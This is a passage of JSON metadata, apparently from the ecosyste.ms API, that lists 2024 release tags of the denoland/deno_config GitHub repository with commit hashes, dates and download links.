ifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.39.3/manifests"},{"name":"0.39.2","sha":"0d07b74100706e8971288466b0ddc1051f8bf8b6","kind":"commit","published_at":"2024-11-20T22:19:29.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.39.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.39.2/manifests"},{"name":"0.39.1","sha":"a8831add39dd156c54ce0394751b48d46168b695","kind":"commit","published_at":"2024-11-15T15:49:35.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.39.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.39.1/manifests"},{"name":"0.39.0","sha":"fc0c07d33b70a01141eebbfbe4bfb8680cafa341","kind":"commit","published_at":"2024-11-15T09:57:48.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.39.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.39.0/manifests"},{"name":"0.38.2","sha":"5d0ff1fb70ca514a3f8b44024567dc8ad45bbf84","kind":"commit","published_at":"2024-11-04T22:55:22.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.38.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"40b4cb452825d6f451198e3b402a13222c87afbf","kind":"commit","published_at":"2024-11-04T19:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.38.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"5ab733afefba24b996594b96d24f730d061b007e","kind":"commit","published_at":"2024-10-25T00:13:05.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.38.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.38.0/manifests"},{"name":"0.37.2","sha":"7d3a05398891232618abc1a1bb8e2fed99ae753a","kind":"commit","published_at":"2024-10-21T16:30:21.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.37.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.37.2/manifests"},{"name":"0.37.1","sha":"3593ec726a8bfc7702ffdcbff673cbbb99cae701","kind":"commit","published_at":"2024-10-02T13:28:54.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.37.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"e83dd2f502e5474186031616afc2c4fb25cabde9","kind":"commit","published_at":"2024-10-02T08:16:09.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.37.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.37.0/manifests"},{"name":"0.36.0","sha":"461cf9ead120d0e03092ba8c95f872ed29b753b5","kind":"commit","published_at":"2024-09-26T13:34:00.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.36.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.36.0/manifests"},{"name":"0.35.0","sha":"8b50d79c526d173734605bf2daf83c18a78ac564","kind":"commit","published_at":"2024-09-23T15:00:48.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.35.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.35.0/manifests"},{"name":"0.34.3","sha":"5f9130623f779fdda8cc4d3f675911f9e69a35ac","kind":"commit","published_at":"2024-09-17T22:51:30.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.34.3","html_url":"https://github.com/denoland/deno_config/releases/tag/0.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.34.3/manifests"},{"name":"0.34.2","sha":"ea076c59dcee8337f76de3ce782e1ced45a084a6","kind":"commit","published_at":"2024-09-13T14:39:08.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.34.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"1948dcf74ad3839b96b32e9e15b6e441ae313067","kind":"commit","published_at":"2024-09-11T07:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.34.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"5ba1bea4fbba0f53397b9c758f56f970808d91a2","kind":"commit","published_at":"2024-09-06T10:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.34.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.34.0/manifests"},{"name":"0.33.2","sha":"df35f5f7395e0e7aecd79dae514f8787185b3403","kind":"commit","published_at":"2024-09-05T12:03:43.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.33.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"4159e5944278f91907f21aba6b2c1a45b67ca831","kind":"commit","published_at":"2024-09-04T14:27:51.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.33.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"d158a352988b4daf142b38553744488cb4a809f0","kind":"commit","published_at":"2024-09-03T13:02:48.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.33.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.33.0/manifests"},{"name":"0.32.0","sha":"09c3c79855ca52707b567bd1f9b8ed347ff0cb19","kind":"commit","published_at":"2024-08-30T20:53:27.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.32.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3f11362cef3a4a00349a321a5391b21b7865efc3","kind":"commit","published_at":"2024-08-30T13:55:07.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.31.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"84da466f8f4219bef5419d754cdea9c6edb548e2","kind":"commit","published_at":"2024-08-29T21:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.31.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.31.0/manifests"},{"name":"0.30.1","sha":"cd972b6d92172caa3ba767369aeaa08f525a8bcb","kind":"commit","published_at":"2024-08-20T16:29:43.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.30.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.30.1/manifests"},{"name":"0.30.0","sha":"9e9eb5edfdce98e9bdb1179c9514b0f134630cdd","kind":"commit","published_at":"2024-08-18T22:10:43.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.30.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"833de912d9b3da0f94d0485b858c36df3c0535e4","kind":"commit","published_at":"2024-08-16T12:33:37.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.29.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"d0b43b67a141f0ee0bca14c486f3d2ab43a40db6","kind":"commit","published_at":"2024-08-06T16:00:25.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.28.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"04cf218cd009580f932ff75272f1c64b6bcc41f7","kind":"commit","published_at":"2024-08-02T12:55:53.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.27.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.27.0/manifests"},{"name":"0.26.1","sha":"bdf8837b8996a40d074ab71c0b76d6025506d37a","kind":"commit","published_at":"2024-07-23T19:44:45.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.26.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.26.1/manifests"},{"name":"0.26.0","sha":"266aa5c20d7fbf3ed6a0a8a272521b115fd59764","kind":"commit","published_at":"2024-07-23T17:18:33.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.26.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"d950a473314e72535c7b9119c81875af30ae2f21","kind":"commit","published_at":"2024-07-19T16:23:38.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.25.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"eb7922b9f2372c1bc3a7756931f0cc9c60962228","kind":"commit","published_at":"2024-07-18T02:24:55.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.24.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"bac48f99210a8c419cfee31bdb1ac451c7133397","kind":"commit","published_at":"2024-07-16T22:38:33.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.23.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.23.0/manifests"},{"name":"0.22.2","sha":"b256510b15f8f418e7d8888abe45e73e67b714a7","kind":"commit","published_at":"2024-07-12T18:48:19.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.22.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.22.2/manifests"},{"name":"0.22.1","sha":"8619a3ba32dbccf4b12126ba42e972d46b3e0b61","kind":"commit","published_at":"2024-07-12T16:47:28.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.22.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.22.1/manifests"},{"name":"0.22.0","sha":"d78815b4fff7f35575424763ad67788dc2c23175","kind":"commit","published_at":"2024-07-12T13:24:46.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.22.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.22.0/manifests"},{"name":"0.21.3","sha":"5c49b2a703b0bec5bea4ed3db4977decfbe7ef5b","kind":"commit","published_at":"2024-07-11T20:31:05.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.21.3","html_url":"https://github.com/denoland/deno_config/releases/tag/0.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.21.3/manifests"},{"name":"0.21.2","sha":"e00444df4b315b0bdcd938dff7eedf50104a4e92","kind":"commit","published_at":"2024-07-11T19:35:33.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.21.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.21.2/manifests"},{"name":"0.21.1","sha":"08eb4171a9587a95a2d4fedc57d818300940b53f","kind":"commit","published_at":"2024-07-11T13:46:09.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.21.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.21.1/manifests"},{"name":"0.21.0","sha":"a155d1ae11263a86bc233c0cd6e84583253b9220","kind":"commit","published_at":"2024-07-10T16:24:42.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.21.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.21.0/manifests"},{"name":"0.20.4","sha":"e79838239bc8053c1eea62765171c811448e4300","kind":"commit","published_at":"2024-07-09T14:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.20.4","html_url":"https://github.com/denoland/deno_config/releases/tag/0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.4/manifests"},{"name":"0.20.3","sha":"f7ddaa8e1b33fa60fe5cce4006707912e1f64463","kind":"commit","published_at":"2024-07-09T14:05:33.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.20.3","html_url":"https://github.com/denoland/deno_config/releases/tag/0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.3/manifests"},{"name":"0.20.2","sha":"c30abc56ef4c7ca57f5314a6f5268e6cfcabf919","kind":"commit","published_at":"2024-07-08T17:31:00.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.20.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.2/manifests"},{"name":"0.20.1","sha":"fd39d55d85a8e582aa433401a5a3e5ed03bd5b87","kind":"commit","published_at":"2024-07-08T13:19:09.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.20.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.1/manifests"},{"name":"0.20.0","sha":"9839ba109fc4787854db5abf3f058a778ce49b9c","kind":"commit","published_at":"2024-07-05T00:33:42.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.20.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.20.0/manifests"},{"name":"0.19.1","sha":"b20167037f809e2d451b1f25f1a97a7516a96163","kind":"commit","published_at":"2024-07-03T23:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.19.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.19.1/manifests"},{"name":"0.19.0","sha":"e924885a29050087dcd0ce9675339ccb7d4883d0","kind":"commit","published_at":"2024-07-03T16:47:37.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.19.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.19.0/manifests"},{"name":"0.18.0","sha":"b9ce6c1411930825144a63f24de1e60ce5237b1f","kind":"commit","published_at":"2024-07-02T16:14:51.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.18.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.18.0/manifests"},{"name":"0.17.0","sha":"6356ba3355c700e797b654704c44f3bfa2f13c74","kind":"commit","published_at":"2024-06-26T17:34:20.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.17.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.17.0/manifests"},{"name":"0.16.4","sha":"813485a86e165eb012c48df1199a0d64c20432a7","kind":"commit","published_at":"2024-05-29T15:34:52.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.16.4","html_url":"https://github.com/denoland/deno_config/releases/tag/0.16.4",